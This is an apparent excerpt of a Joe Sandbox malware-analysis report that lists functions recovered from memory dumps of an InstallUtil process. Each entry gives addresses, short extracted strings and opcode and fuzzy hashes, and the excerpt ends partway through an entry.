Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: ef11419b88033c7d957aa8484ba9427ba093f90e6a91c0fa63a63aaef34fc9ff
Instruction ID: 67ba8055ec00cf35970e8a84a79f541d28ff98d16f75083b60eaa107466525a7
Opcode Fuzzy Hash: ef11419b88033c7d957aa8484ba9427ba093f90e6a91c0fa63a63aaef34fc9ff
Instruction Fuzzy Hash: 3D419F35B102018FE7A5EB65E468A79B3E2EF89300F558069EA0687399DF749C02C781

Function 06753950 Relevance: 3.9, Strings: 3, Instructions: 109COMMON

Download Yara Rule

Strings

$q, xrefs: 06753A21
$q, xrefs: 067539BA
$q, xrefs: 067539C8

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: 8bb84651043a256abd5143214dd150d6a436e4fe1cee93d89b88a3fd56bbddd4
Instruction ID: f2540ffbcdcc9e34d191c5d84ed35517fce183474688464c71e643ca6ead9eaf
Opcode Fuzzy Hash: 8bb84651043a256abd5143214dd150d6a436e4fe1cee93d89b88a3fd56bbddd4
Instruction Fuzzy Hash: A7310571B042058FE794D665E84477BB3E6F7C52A9F16C1BAC849872A8FFB19C0187D0

Function 05690D31 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 05690DC3

Strings

4'q, xrefs: 05690D7C

Memory Dump Source

Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'q
API String ID: 2492992576-1807707664
Opcode ID: ef071fad21a63ae6fbbd0d9662593cafa11c97b03665b4e0617565f650b86c26
Instruction ID: 9f9b382bedca9edb4ec38346f5c754400728c2e665205cc6cb9392c80b99be74
Opcode Fuzzy Hash: ef071fad21a63ae6fbbd0d9662593cafa11c97b03665b4e0617565f650b86c26
Instruction Fuzzy Hash: E82154B5D002198FCB14CFA9E9497EEBBB4FB48321F10841AE819B7381D7386945CFA5

Function 05690D40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 05690DC3

Strings

4'q, xrefs: 05690D7C

Memory Dump Source

Source File: 00000009.00000002.1514543830.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5690000_InstallUtil.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'q
API String ID: 2492992576-1807707664
Opcode ID: ba9a15a9a1a191c4fc3dd4638f43ab4387d6c44cc95d2710b378eb61ba64c1b5
Instruction ID: baea8354699ec65a0b0a64ed09a7bf0784ca911f381c51fabf5ba2d9c1f39e17
Opcode Fuzzy Hash: ba9a15a9a1a191c4fc3dd4638f43ab4387d6c44cc95d2710b378eb61ba64c1b5
Instruction Fuzzy Hash: 562134B4D042198FCB14DFA9E9456EEBBF4FB48320F10851AD819B7381C7386945CFA5

Function 0552A720 Relevance: 3.3, Strings: 2, Instructions: 794COMMON

Download Yara Rule

Strings

$q, xrefs: 0552AA65
2, xrefs: 0552AF67

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID: 2$$q
API String ID: 0-2017333547
Opcode ID: 6e94ff75da27b71d734085e34a47979a0bec51fcfb281a90822e56a2db51ebe2
Instruction ID: 76fb28923500594a130b33075538e4347c82c43ee18400d1d7e514a40ea4a8fe
Opcode Fuzzy Hash: 6e94ff75da27b71d734085e34a47979a0bec51fcfb281a90822e56a2db51ebe2
Instruction Fuzzy Hash: 3C721874A002188FDB55EF65E8947AEB7F6FB89300F2089A9D40AD7398DB30AD51CF51

Function 023D0040 Relevance: 3.1, Strings: 2, Instructions: 599COMMON

Download Yara Rule

Strings

2, xrefs: 023D04B6
$q, xrefs: 023D02DF

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 2$$q
API String ID: 0-2017333547
Opcode ID: a822ab66e98087060930f43b4bd214c56de13321974bd3295b3213e7a919fb88
Instruction ID: d640e4f4f65554cf4aa6dad072c4b6e3e67fd7427a639e3be9a4904dc5ea5f6c
Opcode Fuzzy Hash: a822ab66e98087060930f43b4bd214c56de13321974bd3295b3213e7a919fb88
Instruction Fuzzy Hash: BA424A74A00215CFDB68DF69E580BADB7F2BB89700F2081A9D409DB765DB30AD86CF51

Function 04C3DEF8 Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

(q, xrefs: 04C3DF0C
d, xrefs: 04C3E159

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$d
API String ID: 0-1617062230
Opcode ID: 296d043b89f1f12122de20ed36941a77433af9d9fc01beab3a9156f397e16f6a
Instruction ID: ce60bf09ec98c8549b4af6e7f406d977a376b51f4260a66d01b315ea046ee1d0
Opcode Fuzzy Hash: 296d043b89f1f12122de20ed36941a77433af9d9fc01beab3a9156f397e16f6a
Instruction Fuzzy Hash: D5D15C347006068FDB14DF68C484AAAB7F3FF88315B158969E45A9B7A1DB30FD46CB90

Function 04C3EC80 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Hq, xrefs: 04C3EF2C
Hq, xrefs: 04C3EF94

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 5930fb064655cb756f573a85dc04c437d62ae48d3886eed1f6abc9a42abe6ece
Instruction ID: df39101a7f17eeea6b451f5ca8076fbd1f776a188206a5f0f6d4338beb90baf6
Opcode Fuzzy Hash: 5930fb064655cb756f573a85dc04c437d62ae48d3886eed1f6abc9a42abe6ece
Instruction Fuzzy Hash: FDC19B34A006159FDB14DF69C480AAEBBF2FF88314F158569E8099B3A5DB30FD46CB91

Function 04C3B108 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

$q, xrefs: 04C3B3D6
Plq, xrefs: 04C3B2F0

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: Plq$$q
API String ID: 0-181920578
Opcode ID: 5ec654bf23e30faf43efdd15ff2a7f098b1ea0b3a29da980042382e4837f3df9
Instruction ID: e92b0bfa249c4665513831bb2edf08f470fcd2b0c0245b45c96553b9303bb01b
Opcode Fuzzy Hash: 5ec654bf23e30faf43efdd15ff2a7f098b1ea0b3a29da980042382e4837f3df9
Instruction Fuzzy Hash: C9B11534B002148FDB14DF69D484AAEBBF6BF89711B1540A9E505CB372EB31ED41CBA1

Function 049734A0 Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

4'q, xrefs: 04973780
4'q, xrefs: 04973752

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 4150828146086e2eaaa1eff40708763f197dcd62b076445435d07ea7595c02ae
Instruction ID: 15821af192a1fa7cff0b1f15d2d1c06ef20fad40377662b29983e53609d09a46
Opcode Fuzzy Hash: 4150828146086e2eaaa1eff40708763f197dcd62b076445435d07ea7595c02ae
Instruction Fuzzy Hash: 76C1E775A00218CFDB14EFA4D994A9DB7B6FF89304F104569E906AB3A4DB71EC02CF50

Function 02344640 Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

4'q, xrefs: 023449C9
4'q, xrefs: 023449BD

Memory Dump Source

Source File: 00000009.00000002.1452072673.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Offset: 02340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2340000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: ec0d45afcb18676c0cbe7ed79d664651831e3c7131d3d2937ceb2b16ea3e20f0
Instruction ID: 12faf81b9075a66e6b4b9f3e3bdf7598cab6c62fa07f9f72c6136ef8eaea72b2
Opcode Fuzzy Hash: ec0d45afcb18676c0cbe7ed79d664651831e3c7131d3d2937ceb2b16ea3e20f0
Instruction Fuzzy Hash: 13818F31F50520474E3A2764106933E25EFABC9721724497EEE13DB398DF25EC02ABD2

Function 04973490 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

4'q, xrefs: 04973780
4'q, xrefs: 04973752

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 04d95d1bc503fb9fd9938b819d6465ba342be70d29ac1fb4c67e9ef49f07dc78
Instruction ID: a0d17614339457281d80054daa8b1b960bbfb301400078dd5e6885460c4d47e9
Opcode Fuzzy Hash: 04d95d1bc503fb9fd9938b819d6465ba342be70d29ac1fb4c67e9ef49f07dc78
Instruction Fuzzy Hash: EEC1E775B00218DFDB14EFA4D994A9DB7B6FF89304F104568E506AB3A4DB71EC42CB50

Function 049704A8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

Hq, xrefs: 049705CC
(q, xrefs: 049704F6

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: a790d632bd36d6131bd0d8fa7c0cc2d8b73ca2cc326956eb31c3820b4452256c
Instruction ID: a6dceef2134fa3fb959f4c360e4ef21980b2046bccaf9352209c05909ce27870
Opcode Fuzzy Hash: a790d632bd36d6131bd0d8fa7c0cc2d8b73ca2cc326956eb31c3820b4452256c
Instruction Fuzzy Hash: 0771E374B006158FD705EF28D454A6EB7B6EFCA304B10456AE506DB3A1DB34ED06CBA1

Function 06755CF0 Relevance: 2.7, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

(&q, xrefs: 06755E0B
(q, xrefs: 06755ECA

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: (&q$(q
API String ID: 0-2464455664
Opcode ID: 6602a50992316cea48d6dada9d17d8dc595a920baee999150f954e13c7a6d36b
Instruction ID: 22814c5ad7ef3d0973d9493e71246247275bd3d41a70e577b1d6bded4f8e3903
Opcode Fuzzy Hash: 6602a50992316cea48d6dada9d17d8dc595a920baee999150f954e13c7a6d36b
Instruction Fuzzy Hash: A371B331F002189BEB59DFB5D8907AEBBB2AFC8710F558129E805EB380DE709D46C795

Function 067F29D0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

$q, xrefs: 067F2A84
$q, xrefs: 067F2BB1

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 38c8f5f6dbc5d728fa52d82e3afc79553eed01adde86e952d52fe3be06c65b5c
Instruction ID: d134b624328a68b46bc59583d9c713e3d7afa5eb3dbbc00b72c23cb6dc8d7cc0
Opcode Fuzzy Hash: 38c8f5f6dbc5d728fa52d82e3afc79553eed01adde86e952d52fe3be06c65b5c
Instruction Fuzzy Hash: 0371F330A10201DFDB94DFA4D844B6AF3B2FB80310F65C669DA65AB352DB30EE41CB95

Function 04C39380 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

(q, xrefs: 04C39486
Hq, xrefs: 04C39515

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 54933b5a68f16a83605a55194fa161e59ca4da2c599581db10e22d05946d00b9
Instruction ID: 37d343c4556ec42e64187fc0aa968e57db9910ce880287c084cabd4b20b385de
Opcode Fuzzy Hash: 54933b5a68f16a83605a55194fa161e59ca4da2c599581db10e22d05946d00b9
Instruction Fuzzy Hash: 5151AC74B002148FDB29AF78D454A6E77B7AFC5301B6448ADE50ACB3A1DE71ED02CB91

Function 04972DE0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

(q, xrefs: 04972E47
,q, xrefs: 04972DF0

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$,q
API String ID: 0-275420656
Opcode ID: 868f73be296d0da37419b72b6962f1720d2dfe706fa6f54f5b5ff5acc855f140
Instruction ID: 55c0f501ce0936d6f8d1d211884ab3d31887ce4904a6bada65a1079004378478
Opcode Fuzzy Hash: 868f73be296d0da37419b72b6962f1720d2dfe706fa6f54f5b5ff5acc855f140
Instruction Fuzzy Hash: 3041E533B001596FDF029EE9AC509FFBBEEEF89210B04406AFA04D7241D925DD2597B0

Function 0497BF68 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

(q, xrefs: 0497BFAC
(q, xrefs: 0497C037

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$(q
API String ID: 0-2485164810
Opcode ID: dae73ff301561c4b415a255a477c248ca50743ca12bb3dea488068920a11a3e6
Instruction ID: 060b15070aa8a390f963959c360d5947ae662721ca55c660c46d9fa1768f1906
Opcode Fuzzy Hash: dae73ff301561c4b415a255a477c248ca50743ca12bb3dea488068920a11a3e6
Instruction Fuzzy Hash: 85412471E043558FDB159BB998112EEBFF2EFCA210B24816AD505FB342EA319D0787A1

Function 067F29C1 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

$q, xrefs: 067F2A84
$q, xrefs: 067F2BB1

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 8d8eeae3ad8e0481299fcd466db25a640c3c2debafa9a3ceddc1c3a96fc563c5
Instruction ID: 7b0a414b09f321349cd24003137ab7a05c6e8aa7cb113913d483e25ca3fb6f6e
Opcode Fuzzy Hash: 8d8eeae3ad8e0481299fcd466db25a640c3c2debafa9a3ceddc1c3a96fc563c5
Instruction Fuzzy Hash: A651E230A10205CFDB94DFA4D444BA9F3B2FB80310F65C56ACA65AB352D730EE41CBA5

Function 06753350 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

$q, xrefs: 067534F3
$q, xrefs: 067533A7

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 6eab6eec2a167328ffb0c152ae2ce57fc6fd0caf59f80bb65970a52293896e7e
Instruction ID: ef9e9f5f51f9c3f70c3addb1899d9d480cf2ade3fce0b51f0b27cb948bd28ccc
Opcode Fuzzy Hash: 6eab6eec2a167328ffb0c152ae2ce57fc6fd0caf59f80bb65970a52293896e7e
Instruction Fuzzy Hash: 0D41B530B002058FE755D775E81877BB3E7EBC4250F16C0AED90A87769FEB198018795

Function 055232EE Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

`Qq, xrefs: 0552340C
PHq, xrefs: 05523504

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID: PHq$`Qq
API String ID: 0-577899614
Opcode ID: 719f8a1575d44590be705646cfb6effebece6c6739e12baaaf0ae8b93460e378
Instruction ID: 0d65a81c58700c8b7dd7fe4648fa62ae9dd26f5484e17c94044fc59eb6d821e4
Opcode Fuzzy Hash: 719f8a1575d44590be705646cfb6effebece6c6739e12baaaf0ae8b93460e378
Instruction Fuzzy Hash: B95172B0F44228CBDB24DF65D85976DB77ABB49301F1048A9E90A973C1DB78AD90CF84

Function 04C3F6FA Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

4'q, xrefs: 04C3F78C
pq, xrefs: 04C3F85F

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'q$pq
API String ID: 0-2294260830
Opcode ID: 64ab444d71ed28997b163cf868f6cf7771a6e3ee7e0fa7429c41470c3695295d
Instruction ID: 370423e56c37842d856192f78a3721e399d8552582fbe9badd2d5a15851f1875
Opcode Fuzzy Hash: 64ab444d71ed28997b163cf868f6cf7771a6e3ee7e0fa7429c41470c3695295d
Instruction Fuzzy Hash: 5B41BE30E003059FDB25DB69D8907EEBBE3EFC9300F14892CD0499B755DB71AA068BA1

Function 04C34955 Relevance: 2.6, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

tn^Q, xrefs: 04C3499A
tn^H, xrefs: 04C34992

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: tn^H$tn^Q
API String ID: 0-3032967048
Opcode ID: 8f77a090ae32fdfc3c70e3109bf54c1cb0655f5ec328522a7a3af5a54b6031f9
Instruction ID: f47824370ad2db46656c999a7ae43becad7f8965c8da647e56422e3701c62893
Opcode Fuzzy Hash: 8f77a090ae32fdfc3c70e3109bf54c1cb0655f5ec328522a7a3af5a54b6031f9
Instruction Fuzzy Hash: 15312B13C153606FE321EF7CA8A52E97BE5AE85260F094297C8848E152E4205A4BC3EB

Function 0675394F Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

$q, xrefs: 06753A21
$q, xrefs: 067539BA

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 926112102a3b3bd9f169531c05dc187c2678c22d06128785db9c355f3569d782
Instruction ID: 0dce5a14b9b07b6103be9c1620ce5dfcd1cdf9434ab76f1c12ab59e284009300
Opcode Fuzzy Hash: 926112102a3b3bd9f169531c05dc187c2678c22d06128785db9c355f3569d782
Instruction Fuzzy Hash: 4431E671B042008FE795DA55E84577AA3E2F7C52A9F16C5BAC849872A8FFB1980187C0

Function 023DF928 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

(q, xrefs: 023DF977
Hq, xrefs: 023DF9A3

Memory Dump Source

Source File: 00000009.00000002.1452571742.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_23d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 30b080d8b27ba7d298d01a87788ced64ed24032e5c53505dfc32474a30c0b120
Instruction ID: bf98ca5d3a2d6e1202fdfc6858e0fafc1d4d57271e8dfa67a43c5b09b7d69e35
Opcode Fuzzy Hash: 30b080d8b27ba7d298d01a87788ced64ed24032e5c53505dfc32474a30c0b120
Instruction Fuzzy Hash: 6821F771B082445FE701EF75E850A5E7BE6EFC631471445AAE409CF361DE709D0683A6

Function 067510FF Relevance: 2.6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

%, xrefs: 067511CF
Lw, xrefs: 0675113C

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: %$Lw
API String ID: 0-749731908
Opcode ID: a4d9f31107209985eba86d1f3cd2612e8acef5ec987a010c0a886c415c23fdef
Instruction ID: 9b6ee82d0f2fdf0fd4964bf833fb0510d35ba2356c62c2e0a4de488b385f4c17
Opcode Fuzzy Hash: a4d9f31107209985eba86d1f3cd2612e8acef5ec987a010c0a886c415c23fdef
Instruction Fuzzy Hash: E5110730A012148FD794DB68D869BAAB7F2FB48300F51C0AEE40ADB294DE75AD41CF55

Function 0497802A Relevance: 1.8, Strings: 1, Instructions: 545COMMON

Download Yara Rule

Strings

aq, xrefs: 04977AB3

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: aq
API String ID: 0-608928628
Opcode ID: a5d46f1f95991a244b05738278b3cf7debe59f6d9f2379c6c8216419adf5ecbf
Instruction ID: 7df747fdfe2b2704fc268ff43a8eb4b8f8f46ecff85a19fc21f8157a9e4abf3f
Opcode Fuzzy Hash: a5d46f1f95991a244b05738278b3cf7debe59f6d9f2379c6c8216419adf5ecbf
Instruction Fuzzy Hash: 19122474B041408FD715EFA8D4997ED37A3EBD6304F1A84B4C4018BA9AEB34BC079BA5

Function 04C3A980 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_q, xrefs: 04C3AC10

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: d1baf73b4bc71c0bb3b34c2e3ce93882f5af34ab313e029d2f16b037d5fd2c1e
Instruction ID: 6325956b0851a363450f2e1c409df9c7efa33779cda2365e7158f3bb070b97f4
Opcode Fuzzy Hash: d1baf73b4bc71c0bb3b34c2e3ce93882f5af34ab313e029d2f16b037d5fd2c1e
Instruction Fuzzy Hash: FE22AB75B002149FDB14DFA9D490AADB7B2FF88301F188169E905EB3A1DB72ED50CB90

Function 04977810 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

aq, xrefs: 04977AB3

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: aq
API String ID: 0-608928628
Opcode ID: 9be848325e559958617de2e89156dc8fd86e37cfbc47f8fac466d28ea2d6ecc5
Instruction ID: 548e119ab53b7ecd5a0a3b4b2081aee539e9af4989e194d40462a86461232abc
Opcode Fuzzy Hash: 9be848325e559958617de2e89156dc8fd86e37cfbc47f8fac466d28ea2d6ecc5
Instruction Fuzzy Hash: 5AE1CE70B041048FD714EFA9E045BAE76A7EBC4300F2585B8D8065BB99EF34BC46DB96

Function 04977801 Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

aq, xrefs: 04977AB3

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: aq
API String ID: 0-608928628
Opcode ID: 831919104bce32243b37e085e6e47a74c94274f424de17831f01487d289586a6
Instruction ID: c898872130e4d6849a0f6ceb1ad772e790bc22a5922018de7ccc7ea320d8885d
Opcode Fuzzy Hash: 831919104bce32243b37e085e6e47a74c94274f424de17831f01487d289586a6
Instruction Fuzzy Hash: 69D1BE70B041048BD714EFA8E045BAE77A7EBC4300F2585B8D8065BB99EF74BC46DB95

Function 049778CD Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

aq, xrefs: 04977AB3

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: aq
API String ID: 0-608928628
Opcode ID: ea97b72cb132ca1938c1fd151f9b0457d08366cea61a2e89567e8c2b967c4872
Instruction ID: e67b19653e5d9974b3f82350e13af9f23ff7e9f0c5984a5ff628260d45192c54
Opcode Fuzzy Hash: ea97b72cb132ca1938c1fd151f9b0457d08366cea61a2e89567e8c2b967c4872
Instruction Fuzzy Hash: 07D1AD70B04100CFD714EFA8E045BAE76A7EB84300F2585B8D8065BB99EF74BC46DB96

Function 04977843 Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

aq, xrefs: 04977AB3

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: aq
API String ID: 0-608928628
Opcode ID: 7f9f95e9a8d3660917428609173e67a0a73a48a86dbdbd50605d90d8205a4a06
Instruction ID: f4b7cc045ef104bdc0fd15392c5b7f20b599ab6f3d3dbb547fb16971639277ba
Opcode Fuzzy Hash: 7f9f95e9a8d3660917428609173e67a0a73a48a86dbdbd50605d90d8205a4a06
Instruction Fuzzy Hash: CED19C70B04100CFD714EFA9E045BAE76A7EB84300F2585B8D8065BB99EF74BC46EB95

Function 0497799A Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

aq, xrefs: 04977AB3

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: aq
API String ID: 0-608928628
Opcode ID: 3b323e0fd88e6eab6f3ba7d3a5dacd5a7428af4eba79bfbe2d9c578fc2b8321e
Instruction ID: 9e8e74addb7fdca5692f7ac588c9a9d968a45dd1a8c98086789d8634d3d7e019
Opcode Fuzzy Hash: 3b323e0fd88e6eab6f3ba7d3a5dacd5a7428af4eba79bfbe2d9c578fc2b8321e
Instruction Fuzzy Hash: F5D1BD70B04104CFD714EFA8E045BAE76A7EB84300F2585B8D8065BB99EF74BC46DB96

Function 04977BD7 Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

